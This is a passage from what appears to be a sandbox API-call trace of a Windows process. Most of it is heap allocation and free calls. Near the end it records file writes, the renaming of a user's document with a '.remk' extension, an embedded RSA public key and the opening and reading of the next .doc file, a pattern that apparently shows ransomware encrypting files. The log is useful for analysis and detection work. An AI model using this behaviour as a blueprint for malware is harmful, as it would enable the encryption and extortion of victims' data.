0x31a0ee8 [0235.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.939] GetCurrentThreadId () returned 0x314 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5130 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.939] GetCurrentThreadId () returned 0x314 [0235.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0235.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc660 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc600 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0235.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5e8 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d220 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.945] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x8b99, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x8b99, lpOverlapped=0x0) returned 1 [0235.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.945] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8b9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.945] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.946] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.946] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.946] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.946] CloseHandle (hObject=0x640) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.948] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\pP1VM-.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\pp1vm-.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\pP1VM-.odt.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\pp1vm-.odt.remk")) returned 1 [0235.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.949] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.950] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e6de990, ftCreationTime.dwHighDateTime=0x1d5e294, ftLastAccessTime.dwLowDateTime=0x52101bb0, ftLastAccessTime.dwHighDateTime=0x1d5e605, ftLastWriteTime.dwLowDateTime=0x52101bb0, ftLastWriteTime.dwHighDateTime=0x1d5e605, nFileSizeHigh=0x0, nFileSizeLow=0x11a0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q6Xn7lmS sN.doc", cAlternateFileName="Q6XN7L~1.DOC")) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0235.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0235.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0235.950] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\q6Xn7lmS sN.doc") returned=".doc" [0235.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\q6Xn7lmS sN.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\q6xn7lms sn.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.952] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=72204) returned 1 [0235.952] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.955] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x119e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.955] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.956] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.957] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.957] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11a0c, lpOverlapped=0x0) returned 1 [0235.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.958] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.958] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0235.959] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.959] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.959] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.959] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.959] GetLastError () returned 0x0 [0235.959] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.959] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0235.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.960] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.960] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.960] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11a10) returned 0x37c6278 [0235.960] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d220 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d268 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.961] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 